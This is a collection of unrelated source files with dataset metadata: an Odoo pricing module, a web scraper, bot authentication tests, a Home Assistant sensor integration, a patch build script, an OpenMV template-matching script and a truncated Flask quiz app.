will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with this program. If not, see .\r\n#\r\n##############################################################################\r\n\r\nfrom osv import osv\r\nfrom osv import fields\r\nfrom tools.translate import _\r\nimport time\r\nimport pooler\r\n\r\n\r\nclass product_pct_platts_venta_cliente(osv.osv):\r\n _name = 'product.pct.platts.venta.cliente'\r\n\t\r\n def _precio_platts_usd(self,cr,uid,ids,field,arg,context=None):\r\n res = {}\r\n for obs in self.browse(cr, uid, ids, context=context):\r\n precio = obs.id_producto.precio_platts_aplicable_tonelada * obs.pct_platts\r\n res[obs.id] = precio\r\n \r\n return res\r\n\t\t\r\n _columns = {\r\n\t\t'id_producto' : fields.many2one('product.product','Producto asociado'),\r\n\t\t'id_cliente' : fields.many2one('res.partner','Cliente asociado'),\r\n 'pct_platts' : fields.float('Es el porcentaje de platts aplicable al cliente de ese producto', digits=(6, 5)),\r\n\t\t'precio_platts' : fields.function(_precio_platts_usd, type='float', string='Precio de referencia del Platts por tonelada(USD)', digits=(10, 5)),\r\n 'comentarios' : fields.text('Comentarios sobre el precio'),\r\n }\r\n\t\t\r\nclass product_product(osv.osv):\r\n _name = 'product.product'\r\n _inherit = 'product.product'\r\n \r\n \r\n def _precio_referencia_platts_usd(self,cr,uid,ids,field,arg,context=None):\r\n res = {}\r\n #ids_variables = self.pool.get('sale.variables.periodicas').search(cr, uid, [('active', '=', True)] , order = 'fecha')\r\n #if isinstance(ids_variables, (long, int)):\r\n # ids_variables = [ids_variables]\r\n #platts = self.pool.get('sale.variables.periodicas').browse(cr, uid, ids_variables, context=context)\r\n #precio_platts = platts[0].platts_valor \r\n for producto in self.browse(cr, uid, ids, context=context):\r\n precio_platts = producto.tipo_platts_aplicable.platts_valor\r\n try:\r\n #Se divide entre 2.2046 para cambiar de libras a kilos\r\n precio = precio_platts * 2.2046\r\n if (arg == 'kilo'):\r\n res[producto.id] = precio * 10\r\n else:\r\n res[producto.id] = precio * 10\r\n except:\r\n res[producto.id] = -1\r\n return res\r\n\t\t\r\n _columns = {\r\n 'metodo_calculo_precio_venta': fields.selection([('normal','Precio directo'), ('platts','Precio en base a Platts')],\r\n\t\t\t'Metodo de calculo de precio de compra'),\r\n\t\t'tipo_platts_aplicable' : fields.many2one('sale.variables.periodicas','Tipo de platts asociado al producto'),\r\n\t\t'pct_platts_venta_clientes' : fields.one2many('product.pct.platts.venta.cliente', 'id_producto', 'Porcentaje de platts aplicables a clientes'),\r\n\t\t'precio_platts_aplicable_kilo' : fields.function(_precio_referencia_platts_usd, arg='kilo', type='float', string='Precio de referencia del Platts (USD)', digits=(10, 5)),\r\n\t\t'precio_platts_aplicable_tonelada' : fields.function(_precio_referencia_platts_usd, arg='tonelada',type='float', string='Precio de referencia del Platts (USD)', digits=(10, 5)),\r\n\t}\r\n\r\n\t\t\t\r\nproduct_product()\r\n\r\n\r\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\r\n\r\n","sub_path":"funofertiz_ventas/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"585006630","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nimport json\n\nurl = 'https://kazemai.github.io/fgo-vz/servant.html'\n\ndef writeToJSONFile(path,fileName, data):\n filePathNameWExt = './'+ path + fileName + '.json'\n with open(filePathNameWExt, 'w', encoding=\"utf-8\") as fp:\n json.dump(data, fp,ensure_ascii=False, indent=2)\n\n# firefox headless\nfireFoxOptions = webdriver.FirefoxOptions()\nfireFoxOptions.set_headless()\n\ndriver = webdriver.Firefox(firefox_options=fireFoxOptions)\n\ndriver.get(url)\npageSource = driver.page_source\n\nsoup = BeautifulSoup(pageSource, 'lxml') # 解析器\nresult = soup.find_all(\"tr\", class_=\"svtList\")\n\n# trun data into JSON format\ndata = []\nfor count, item in enumerate(result, start=1):\n dataObj = {}\n nameList = item.contents[3].get_text(\"|\").split(\"|\")\n dataObj[\"cName\"] = nameList[1].strip()\n dataObj[\"jName\"] = nameList[0].strip()\n dataObj[\"url\"] = \"https://kazemai.github.io/fgo-vz/\"+item.contents[3].a.get(\"href\")\n dataObj[\"ui\"] = item.contents[1].get_text()\n dataObj[\"rare\"] = len(item.contents[2].get_text())\n dataObj[\"class\"] = item.contents[4].img.get(\"title\")\n dataObj[\"baseHp\"] = item.contents[5].get_text()\n dataObj[\"maxHp\"] = item.contents[6].get_text()\n dataObj[\"baseAtt\"] = item.contents[7].get_text()\n dataObj[\"maxAtt\"] = item.contents[8].get_text()\n dataObj[\"cost\"] = item.contents[11].get_text()\n data.append(dataObj)\n\nwriteToJSONFile('webCrawling/','servent',data)\n\n\ndriver.quit()","sub_path":"webCrawling/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"611639547","text":"import unittest\nfrom handler_test import MessageHandlerTest\nfrom authentication import Authenticator\nfrom user_pb2 import User\nimport pycountry\n\nclass AuthenticatorTest(MessageHandlerTest):\n \"\"\"\n Tests for the authenticator class.\n \"\"\"\n\n def setUp(self):\n super(AuthenticatorTest, self).setUp()\n # We are in the AuthenticatorTest, thus the user is authenticating.\n self.user.state = User.AUTHENTICATING\n\n # Modifies a bit the language configuration for as an exercise.\n self.config[\"languages\"] = \"ru,ar,el\"\n\n self.authenticator = Authenticator(\n self.db, self.users, self.config, mock = True)\n\n def getUserSubState(self):\n \"\"\"\n Returns the user substate as Authenticator.Substate\n \"\"\"\n return self.authenticator.substates[self.user.id]\n\n def testValidLanguages(self):\n self.assertEqual(len(self.authenticator.validLanguagesCodes), 3)\n\n def testHandle(self):\n \"\"\"\n This function is doing some routing, therefore just make sure it does\n run.\n \"\"\"\n msg = self.makeMessage()\n self.authenticator.handle(self.bot, msg)\n\n def testStart(self):\n \"\"\"\n Test that the state of the user after start is phone.\n \"\"\"\n msg = self.makeMessage()\n self.authenticator.start(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.phone)\n\n def testReceiveNoPhone(self):\n \"\"\"\n Tests what happens when the user decline sharing his contact.\n \"\"\"\n msg = self.makeMessage()\n\n # The user does not want to share his contact information\n msg.is_contact = False\n msg.text = \"No thanks!\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertFalse(self.user.who.HasField(\"phone_number\"))\n self.assertFalse(self.user.where.HasField(\"country_code\"))\n self.assertFalse(self.user.where.HasField(\"country\"))\n self.assertFalse(self.user.languages.HasField(\"mother_tongue\"))\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveTextInsteadOfPhone(self):\n \"\"\"\n Tests what happens when the user decline sharing his contact.\n \"\"\"\n msg = self.makeMessage()\n\n # The user entered some text instead of clicking. Ask again.\n msg.is_contact = False\n msg.text = \"Nope\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.phone)\n\n def testReceiveValidPhone(self):\n \"\"\"\n Test that when receiving the phone number, the country and locale of\n the user are well defined.\n \"\"\"\n msg = self.makeMessage()\n\n # Brazilian phone number\n msg.is_contact = True\n phone = \"5531991457647\"\n msg.text = phone\n self.authenticator.receivePhone(self.bot, msg)\n\n self.assertEqual(self.user.who.phone_number, \"+\" + phone)\n self.assertEqual(self.user.where.country_code, \"BR\")\n self.assertEqual(self.user.where.country, \"Brazil\")\n self.assertEqual(self.user.languages.mother_tongue, \"pt\")\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n # Canadian phone number\n msg.text = \"14168471900\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertEqual(self.user.where.country_code, \"CA\")\n self.assertEqual(self.user.where.country, \"Canada\")\n self.assertEqual(self.user.languages.mother_tongue, \"en\")\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n # Cypriot phone number\n msg.text = \"35722585300\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertEqual(self.user.where.country_code, \"CY\")\n self.assertEqual(self.user.where.country, \"Cyprus\")\n self.assertEqual(self.user.languages.mother_tongue, \"el\")\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveValidEmail(self):\n \"\"\"\n Check that if a correct email is provided the user changes states\n and that if not we stay in the same state.\n \"\"\"\n msg = self.makeMessage()\n\n # Valid email syntax: go to confirmation state\n msg.text = \"example@example.org\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.confirmation)\n\n def testReceiveInvalidEmail(self):\n \"\"\"\n Check that if a correct email is provided the user changes states\n and that if not we stay in the same state.\n \"\"\"\n msg = self.makeMessage()\n\n # Invalid email syntax: stay in state email\n msg.text = \"example@example\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n # Invalid email syntax\n msg.text = \"example\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveInvalidConfirmation(self):\n \"\"\"\n Tests the flow when the confirmation key is incorrect.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = \"bobo\"\n self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.confirmation)\n\n def testReceiveValidConfirmation(self):\n \"\"\"\n Tests the flow when the confirmation key is correct and copy-pasted.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = key\n self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\n def testReceiveValidConfirmationFromLink(self):\n \"\"\"\n Tests the flow when the confirmation key is correct and comes from link.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = \"/start \" + key\n self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\n def testReceiveValidBrotherTongue(self):\n \"\"\"\n Test that the substate is deleted and that the state is then IDLE.\n \"\"\"\n msg = self.makeMessage()\n code = self.authenticator.validLanguagesCodes[0]\n msg.text = pycountry.languages.get(iso639_1_code = code).name\n\n self.authenticator.substates[self.user.id] = \\\n Authenticator.Substate.brother_tongue\n\n self.authenticator.receiveBrotherTongue(self.bot, msg)\n self.assertFalse(self.user.id in self.authenticator.substates)\n self.assertEqual(self.user.state, User.IDLE)\n\n def testReceiveInvalidBrotherTongue(self):\n \"\"\"\n Tests that the user stays in state brother_tongue is the brother_tongue\n entered is invalid.\n \"\"\"\n msg = self.makeMessage()\n msg.text = \"hebrew\"\n\n self.authenticator.receiveBrotherTongue(self.bot, msg)\n self.assertTrue(self.user.id in self.authenticator.substates)\n self.assertEqual(self.user.state, User.AUTHENTICATING)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(AuthenticatorTest)\n unittest.TextTestRunner().run(suite)\n","sub_path":"src/authentication_test.py","file_name":"authentication_test.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"508591590","text":"\n\nclass DictionaryMaker:\n def make_dict(self, data, format):\n handler = get_handler(format)\n return handler(data)\n\n\ndef get_handler(format):\n if format == 'JSON':\n return _json_to_dict\n elif format == 'TEXT':\n return _text_to_dict\n elif format == 'XML':\n return _xml_to_dict\n else:\n raise ValueError(format)\n\n\ndef _json_to_dict(data):\n action_1 = ':('\n action_2 = ':|'\n action_3 = ':)'\n dictionary = 'this is a dictionary'\n return dictionary\n\n\ndef _text_to_dict(data):\n complex_action_with_ML = 'uiii'\n dictionary = 'this is a dictionary'\n return dictionary\n\ndef _xml_to_dict(data):\n action_1 = 'arrr'\n complex_action_with_ML = 'uiii'\n dictionary = 'this is a dictionary'\n return dictionary","sub_path":"1_home_work.py","file_name":"1_home_work.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"604971542","text":"from __future__ import annotations\nfrom homeassistant import config_entries, core\nfrom homeassistant.components.binary_sensor import (\n\tBinarySensorEntity,\n\tDEVICE_CLASS_CONNECTIVITY,\n\tDEVICE_CLASS_DOOR,\n\tDEVICE_CLASS_GARAGE_DOOR,\n\tDEVICE_CLASS_GAS,\n\tDEVICE_CLASS_LOCK,\n\tDEVICE_CLASS_MOISTURE,\n\tDEVICE_CLASS_MOTION,\n\tDEVICE_CLASS_PROBLEM,\n\tDEVICE_CLASS_SMOKE,\n\tDEVICE_CLASS_TAMPER,\n\tDEVICE_CLASS_WINDOW,\n)\nfrom homeassistant.const import (\n\tENTITY_CATEGORY_DIAGNOSTIC,\n\tSTATE_ON,\n)\nfrom typing import Final\nfrom .const import (\n\tDATA_JABLOTRON,\n\tDEVICE_MOTION_DETECTOR,\n\tDEVICE_WINDOW_OPENING_DETECTOR,\n\tDEVICE_DOOR_OPENING_DETECTOR,\n\tDEVICE_GARAGE_DOOR_OPENING_DETECTOR,\n\tDEVICE_GLASS_BREAK_DETECTOR,\n\tDEVICE_SMOKE_DETECTOR,\n\tDEVICE_FLOOD_DETECTOR,\n\tDEVICE_GAS_DETECTOR,\n\tDEVICE_KEY_FOB,\n\tDEVICE_SIREN_INDOOR,\n\tDEVICE_BUTTON,\n\tDEVICE_THERMOSTAT,\n\tDEVICE_LOCK,\n\tDEVICE_TAMPER,\n\tDOMAIN,\n)\nfrom .jablotron import Jablotron, JablotronDevice, JablotronEntity\n\nDEVICE_CLASSES: Final = {\n\tDEVICE_MOTION_DETECTOR: DEVICE_CLASS_MOTION,\n\tDEVICE_WINDOW_OPENING_DETECTOR: DEVICE_CLASS_WINDOW,\n\tDEVICE_DOOR_OPENING_DETECTOR: DEVICE_CLASS_DOOR,\n\tDEVICE_GARAGE_DOOR_OPENING_DETECTOR: DEVICE_CLASS_GARAGE_DOOR,\n\tDEVICE_FLOOD_DETECTOR: DEVICE_CLASS_MOISTURE,\n\tDEVICE_GAS_DETECTOR: DEVICE_CLASS_GAS,\n\tDEVICE_SMOKE_DETECTOR: DEVICE_CLASS_SMOKE,\n\tDEVICE_LOCK: DEVICE_CLASS_LOCK,\n\tDEVICE_TAMPER: DEVICE_CLASS_TAMPER,\n}\n\n\nasync def async_setup_entry(hass: core.HomeAssistant, config_entry: config_entries.ConfigEntry, async_add_entities) -> None:\n\tjablotron = hass.data[DOMAIN][config_entry.entry_id][DATA_JABLOTRON]\n\n\tasync_add_entities((JablotronDeviceSensorEntity(jablotron, control) for control in jablotron.device_sensors()))\n\n\tasync_add_entities((JablotronProblemSensorEntity(jablotron, control) for control in jablotron.section_problem_sensors()))\n\tasync_add_entities((JablotronProblemSensorEntity(jablotron, control) for control in jablotron.device_problem_sensors()))\n\n\tlan_connection = jablotron.lan_connection()\n\tif lan_connection is not None:\n\t\tasync_add_entities([JablotronLanConnectionEntity(jablotron, lan_connection)])\n\n\tgsm_signal_sensor = jablotron.gsm_signal_sensor()\n\tif gsm_signal_sensor is not None:\n\t\tasync_add_entities([JablotronGsmSignalEntity(jablotron, gsm_signal_sensor)])\n\n\nclass JablotronBinarySensor(JablotronEntity, BinarySensorEntity):\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tself._attr_is_on = self._get_state() == STATE_ON\n\n\nclass JablotronProblemSensorEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_PROBLEM\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\nclass JablotronDeviceSensorEntity(JablotronBinarySensor):\n\n\t_control: JablotronDevice\n\n\tdef __init__(\n\t\tself,\n\t\tjablotron: Jablotron,\n\t\tcontrol: JablotronDevice,\n\t) -> None:\n\n\t\tself._attr_device_class = DEVICE_CLASSES[control.type] if control.type in DEVICE_CLASSES else None\n\n\t\tsuper().__init__(jablotron, control)\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tif self._control.type == DEVICE_GLASS_BREAK_DETECTOR:\n\t\t\tself._attr_icon = \"mdi:image-broken-variant\" if self._attr_is_on else \"mdi:square-outline\"\n\t\telif self._control.type in (DEVICE_KEY_FOB, DEVICE_BUTTON):\n\t\t\tself._attr_icon = \"mdi:gesture-double-tap\" if self._attr_is_on else \"mdi:circle-double\"\n\t\telif self._control.type == DEVICE_SIREN_INDOOR:\n\t\t\tself._attr_icon = \"mdi:gesture-tap-box\" if self._attr_is_on else \"mdi:circle-box-outline\"\n\t\telif self._control.type == DEVICE_THERMOSTAT:\n\t\t\tself._attr_icon = \"mdi:thermometer\" if self._attr_is_on else \"mdi:thermometer-off\"\n\n\nclass JablotronLanConnectionEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_CONNECTIVITY\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\nclass JablotronGsmSignalEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_CONNECTIVITY\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tself._attr_icon = \"mdi:signal\" if self._attr_is_on else \"mdi:signal-off\"\n","sub_path":"custom_components/jablotron100/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"144241022","text":"import shutil\nfrom pathlib import Path\nfrom subprocess import CalledProcessError, run\nfrom urllib.request import urlopen\n\nfrom argh import CommandError, wrap_errors, arg, ArghParser\n\nfrom . import *\n\n\ndef handle_exc(e):\n if isinstance(e, CalledProcessError):\n return 'Error executing command \"{}\"'.format(' '.join(e.cmd))\n elif isinstance(e, JDiffException):\n return f\"Error running JDiff: {e}\"\n else:\n raise RuntimeError(\"Unexpected exception\") from e\n\n\n@wrap_errors([CalledProcessError], processor=handle_exc)\ndef setup():\n \"\"\"Setup the development environment, re-applying all the Paper and TacoSpigot patches.\"\"\"\n WORK_DIR.mkdir(exist_ok=True)\n repository = Path(Path.cwd(), \"TacoSpigot\")\n if not repository.exists():\n raise CommandError(\"TacoSpigot repository not found!\")\n print(\"---- Cleaning TacoSpigot\")\n run([\"bash\", \"clean.sh\"], cwd=repository, check=True)\n print(\"---- Preparing upstream repositories\")\n run([\"bash\", \"prepare-build.sh\"], cwd=repository, check=True)\n if not JDIFF_JAR.exists():\n print(f\"---- Downloading JDiff {JDIFF_VERSION}\")\n with urlopen(JDIFF_URL) as r:\n with open(JDIFF_JAR, 'wb+') as f:\n shutil.copyfileobj(r, f)\n\n\n@wrap_errors([JDiffException, CalledProcessError], processor=handle_exc)\n@arg('--quiet', help=\"Only print messages when errors occur\")\ndef patch(quiet=False):\n \"\"\"Applies the patch files to the working directory, overriding any existing work.\"\"\"\n server_repo = Path(Path.cwd(), \"TacoSpigot\", \"TacoSpigot-Server\")\n if not server_repo.exists():\n raise CommandError(\"Couldn't find TacoSpigot-Server\")\n tacospigot_sources = Path(server_repo, \"src\", \"main\", \"java\")\n if not tacospigot_sources.exists():\n raise CommandError(\"Couldn't find TacoSpigot sources!\")\n mojang_sources = Path(PAPER_WORK_DIR, minecraft_version())\n if not mojang_sources.exists():\n raise CommandError(\"Couldn't find mojang sources!\")\n unpatched_sources = Path(WORK_DIR, \"unpatched\")\n if unpatched_sources.exists():\n print(\"---- Reusing cached original sources\")\n else:\n print(\"---- Copying original sources from TacoSpigot\")\n shutil.copytree(tacospigot_sources, unpatched_sources)\n # Copy the remaining mc-dev sources that aren't already in TacoSpigot\n # This makes it so we don't have to depend on the mojang server fat jar,\n # giving us complete control over our dependencies.\n print(\"---- Copying remaining sources from decompiled mojang jar\")\n mojang_nms_sources = Path(mojang_sources, \"net/minecraft/server\")\n unpatched_nms_sources = Path(unpatched_sources, \"net/minecraft/server\")\n for file in mojang_nms_sources.iterdir():\n assert not file.is_dir(), f\"Unexpected directory: {file}\"\n unpatched_file = Path(unpatched_nms_sources, file.name)\n if not unpatched_file.exists():\n shutil.copy2(file, unpatched_file)\n patches = Path(Path.cwd(), \"patches\")\n patches.mkdir(exist_ok=True)\n patched_sources = Path(Path.cwd(), \"patched\")\n if patched_sources.exists():\n print(\"---- Clearing existing patched sources\")\n shutil.rmtree(patched_sources)\n print(\"---- Copying unpatched sources into patched directory\")\n shutil.copytree(unpatched_sources, patched_sources)\n if not patches.exists() or not list(patches.iterdir()):\n print(\"---- No patches to apply\")\n return\n print(\"---- Applying Fountain patches via JDiff\")\n run_jdiff(\"patch\", unpatched_sources, patched_sources, patches, quiet=quiet)\n\n@wrap_errors([JDiffException, CalledProcessError], processor=handle_exc)\n@arg('--quiet', help=\"Only print messages when errors occur\")\ndef diff(quiet=False):\n \"\"\"Regenerates the patch files from the contents of the working directory.\"\"\"\n unpatched_sources = Path(WORK_DIR, \"unpatched\")\n if not unpatched_sources.exists():\n raise CommandError(\"Couldn't find unpatched sources!\")\n patched_dir = Path(Path.cwd(), \"patched\")\n if not patched_dir.exists():\n raise CommandError(\"No patched files found!\")\n patches = Path(Path.cwd(), \"patches\")\n patches.mkdir(exist_ok=True)\n print(\"---- Recomputing Fountain patches via JDiff\")\n run_jdiff(\"diff\", unpatched_sources, patched_dir, patches, quiet=quiet)\n\nif __name__ == \"__main__\":\n parser = ArghParser(prog=\"fountain.sh\", description=\"The TacoFountain build system\")\n parser.add_commands([setup, patch, diff])\n parser.dispatch()\n","sub_path":"scripts/fountain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"631200128","text":"# Template Matching Example - Normalized Cross Correlation (NCC)\r\n#\r\n# This example shows off how to use the NCC feature of your OpenMV Cam to match\r\n# image patches to parts of an image... expect for extremely controlled enviorments\r\n# NCC is not all to useful.\r\n#\r\n# WARNING: NCC supports needs to be reworked! As of right now this feature needs\r\n# a lot of work to be made into somethin useful. This script will reamin to show\r\n# that the functionality exists, but, in its current state is inadequate.\r\n\r\nimport time, sensor, image, pyb, ustruct\r\nfrom image import SEARCH_EX, SEARCH_DS\r\nfrom pyb import LED\r\nfrom pyb import UART\r\n\r\n# Reset sensor\r\nsensor.reset()\r\n\r\n# Set sensor settings\r\nsensor.set_contrast(1)\r\nsensor.set_gainceiling(16)\r\n# Max resolution for template matching with SEARCH_EX is QQVGA\r\nsensor.set_framesize(sensor.QQVGA)\r\n# You can set windowing to reduce the search image.\r\n#sensor.set_windowing(((640-80)//2, (480-60)//2, 80, 60))\r\nsensor.set_pixformat(sensor.GRAYSCALE)\r\nuart = UART(3, 9600)\r\n\r\nred_led = LED(1)\r\ngreen_led = LED(2)\r\nblue_led = LED(3)\r\nblue_led.on()\r\n\r\n# Load template.\r\n# Template should be a small (eg. 32x32 pixels) grayscale image.\r\nleft18_1 = image.Image(\"left18_head.pgm\")\r\nleft18_2 = image.Image(\"left18_mid.pgm\")\r\nright18_1 = image.Image(\"right18_head.pgm\")\r\nright18_2 = image.Image(\"right18_mid.pgm\")\r\nleft25_1 = image.Image(\"left25_head.pgm\")\r\nleft25_2 = image.Image(\"left25_mid.pgm\")\r\nright25_1 = image.Image(\"right25_head.pgm\")\r\nright25_2 = image.Image(\"right25_mid.pgm\")\r\nleft40_1 = image.Image(\"left40_head.pgm\")\r\nleft40_2 = image.Image(\"left40_mid.pgm\")\r\nright40_1 = image.Image(\"right40_head.pgm\")\r\nright40_2 = image.Image(\"right40_mid.pgm\")\r\nuart.write(\"123\")\r\nclock = time.clock()\r\n\r\n\r\n\r\ndef match(left1, left2, right1, right2):\r\n # Run template matching\r\n blue_led.off()\r\n green_led.on()\r\n clock.tick()\r\n img = sensor.snapshot()\r\n\r\n # find_template(template, threshold, [roi, step, search])\r\n # ROI: The region of interest tuple (x, y, w, h).\r\n # Step: The loop step used (y+=step, x+=step) use a bigger step to make it faster.\r\n # Search is either image.SEARCH_EX for exhaustive search or image.SEARCH_DS for diamond search\r\n #\r\n # Note1: ROI has to be smaller than the image and bigger than the template.\r\n # Note2: In diamond search, step and ROI are both ignored.\r\n l_1 = img.find_template(left1, 0.85, step=3, search=SEARCH_DS) #, roi=(10, 0, 60, 60))\r\n l_2 = img.find_template(left2, 0.8, step=3, search=SEARCH_DS)\r\n r_1 = img.find_template(right1, 0.85, step=3, search=SEARCH_DS) #, roi=(10, 0, 60, 60))\r\n r_2 = img.find_template(right2, 0.8, step=3, search=SEARCH_DS)\r\n if ((l_1 and l_2) and (not (r_1 and r_2))): #left 2\r\n uart.write(\"[2]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"left\")\r\n blue_led.off()\r\n elif ((r_1 and r_2) and (not (l_1 and l_2))):#right 1\r\n uart.write(\"[1]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"right\")\r\n blue_led.off()\r\n elif ((l_1 or l_2) and (not (r_1 and r_2))):#left 2\r\n uart.write(\"[2]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"special_left\")\r\n blue_led.off()\r\n elif ((r_1 or r_2) and (not (l_1 and l_2))):#right 1\r\n uart.write(\"[1]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"special_right\")\r\n blue_led.off()\r\n else:\r\n uart.write(\"[0]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n red_led.on()\r\n print(\"sb\")\r\n red_led.off()\r\n\r\nwhile True:\r\n match(left18_1, left18_2, right18_1, right18_2)\r\n match(left25_1, left25_2, right25_1, right25_2)\r\n match(left40_1, left40_2, right40_1, right40_2)\r\n","sub_path":"F8_template/F8_template_matching.py","file_name":"F8_template_matching.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"233060318","text":"from flask import Flask, render_template,session,request,redirect,url_for,make_response\nfrom flask_sqlalchemy import SQLAlchemy\nimport random\nimport datetime\nimport os\napp= Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']=os.environ.get(\"DATABASE_URL\")\napp.config['SECRET_KEY']='1x25d1d63s4ddnant'\ndb=SQLAlchemy(app)\nclass User(db.Model):\n id=db.Column(db.Integer(), primary_key=True)\n username=db.Column(db.String(30), nullable=False, unique=False)\n email_address=db.Column(db.String(50), nullable=False, unique=False)\n marks=db.Column(db.Integer(),nullable=False,default=0)\n date=db.Column(db.String(20),nullable=False)\nclass Question(db.Model):\n id=db.Column(db.Integer(), primary_key=True)\n question = db.Column(db.String(1024), nullable=False, unique=True)\n option_1 = db.Column(db.String(1024), nullable=False, unique=False)\n option_2 = db.Column(db.String(1024), nullable=False, unique=False)\n option_3 = db.Column(db.String(1024), nullable=False, unique=False)\n option_4 = db.Column(db.String(1024), nullable=False, unique=False)\n answer = db.Column(db.Integer(),nullable=False,unique=False)\nclass Admin_log(db.Model):\n id = db.Column(db.Integer(), primary_key=True)\n ip=db.Column(db.String(20),nullable=False)\n#question=[]\n@app.route('/')\n@app.route('/login')\ndef index():\n session[\"name\"] =\"\"\n session[\"email\"]=\"\"\n session[\"flag\"] =0\n session['complete']=False\n session[\"access\"]=0\n session[\"questionsa\"]=[]\n return render_template('login.html')\n@app.route('/quest',methods=[\"GET\",\"POST\"])\ndef quest():\n if request.method==\"POST\":\n session[\"name\"] = request.form.get(\"username\")\n session[\"email\"] = request.form.get(\"email\")\n session['marks']=0\n session[\"flag\"]=0\n all_q = Question.query.all()\n question = []\n for q in all_q:\n question.append(q)\n #print(question)\n total = 5\n question = random.sample(question, total)\n\n mn = []\n\n for i in question :\n d = {}\n d['question'] = i.question\n d['option_1'] = i.option_1\n d['option_2'] = i.option_2\n d['option_3'] = i.option_3\n d['option_4'] = i.option_4\n d['answer'] = i.answer\n mn.append(d)\n session[\"questionsa\"] = mn\n return redirect('/questions',code=302)\n return redirect(\"login.html\",code=302)\n@app.route('/questions',methods=[\"GET\",\"POST\"])\ndef generated_question():\n question = session[\"questionsa\"]\n if session['complete']:\n return redirect('/',code=\"302\")\n #print(len(question))\n try:\n if session['flag']==0:\n session['flag']=1;\n return render_template(\"question.html\", q=question[0], que=5-len(question)+1)\n x=question[0]\n except:\n return \"

ACCESS DENIED

\"\n x=question[0]\n question.pop(0)\n option=request.args.get(\"option\")\n try:\n option=int(option)\n except:\n option=0\n if x[\"answer\"]==int(option):\n session['marks']+=1\n #print(session['marks'])\n try:\n return render_template(\"question.html\", q=question[0],que=5-len(question)+1)\n except:\n return redirect('/sub',code=302)\n@app.route('/submit',methods=[\"GET\",\"POST\"])\ndef subsubmit():\n question = session[\"questionsa\"]\n session['complete']=True\n try:\n x=question[0]\n except:\n return \"

ACCESS DENIED

